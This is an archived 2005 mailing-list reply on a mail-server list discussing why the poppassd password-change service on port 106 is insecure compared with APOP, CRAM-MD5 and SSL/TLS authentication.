Mailing List Message #15125
From: Bill Cole <>
Subject: Re: poppassd & Eudora
Date: Fri, 16 Sep 2005 09:09:42 -0400
To: SIMS Discussions <>
At 1:47 PM -0400 9/15/05, Stefan Jeglinski  imposed structure on a stream of electrons, yielding:
Allow me to be difficult for just one more moment.

otherwise, why claim that it is so grossly insecure when normal e-mail is so grossly insecure anyway?

Note that passwords in the clear for email have become fairly uncommon. Even SIMS supports CRAM-MD5 authentication for SMTP and APOP for POP3.

Supporting such and configuring it that way OOTB are 2 different things. You usually have a good pulse on e-mail trends. Given the most common consumer level computers, ie, Windows XP running Outlook Express, or business installations, ie, Windows XP running Outlook, is password encryption turned on by default as installed? Or is it turned off, instead relying on ISPs to enforce authentication procedures? Put another way, do ISPs these days still spend a lot of time educating their new users, or is APOP etc such a common default that new users aren't even aware that they are implementing it?

Every modern mailer provides APOP support and most provide SSL/TLS support. Putting POP3 over SSL/TLS or at least requiring APOP are more common than not with ISP's today. Virtually every SMTP AUTH system supports CRAM-MD5 and clients that use SMTP AUTH will generally use the strongest method available (i.e. most don't even provide the user any visible means to pick which auth method is used.) Some providers (in the US the most notable is Yahoo, which runs the SBC POP3 servers) remain foolish and allow users to use clear passwords if they choose, but I don't think any major ISP's require clear passwords.

In contrast: there is no such thing as a poppassd that does not require passwords in the clear.

 Is there something *beyond* sending passwords in clear text that makes poppassd so insecure?

1. It uses a TCP port which, while assigned to a totally different protocol, is in fact only used on the open Internet for this protocol. This makes sniffing the protocol very highly efficient.

Why could I not make the same argument for port 110? (aside from the issue of assignment to another protocol, which I find neutral to the point).

Virtually every packet with any content aimed at port 106 will contain authentication information. Most port 110 traffic is not authentication information, and there's so much more of it. This is why I call sniffing poppassd more efficient: catch 5 packets with payload aimed at port 106 on a poppassd host and you may have 3 accounts in hand.

I am more worried today about sniffable protocols than I was 5 years ago for sound reasons. 5 years ago it would have been unusual to find a home machine running trojan bots doing keystroke logging, packet sniffing, and remote control service. Now it is a normal circumstance. A Windows machine whose owner has not been very careful is more likely than not to be running software designed to steal their private information, and many of those programs include pieces like keyloggers and packet sniffers. It no longer requires a router crack to sniff traffic between end users and their ISP mail systems.

2. It provides a sniffer instant knowledge of how to use a sniffed password to take over an account completely, i.e. how to change the password himself.

This one I readily concede. Thanks for pointing it out.

Bill Cole                        

Subscribe (FEED) Subscribe (DIGEST) Subscribe (INDEX) Unsubscribe Mail to Listmaster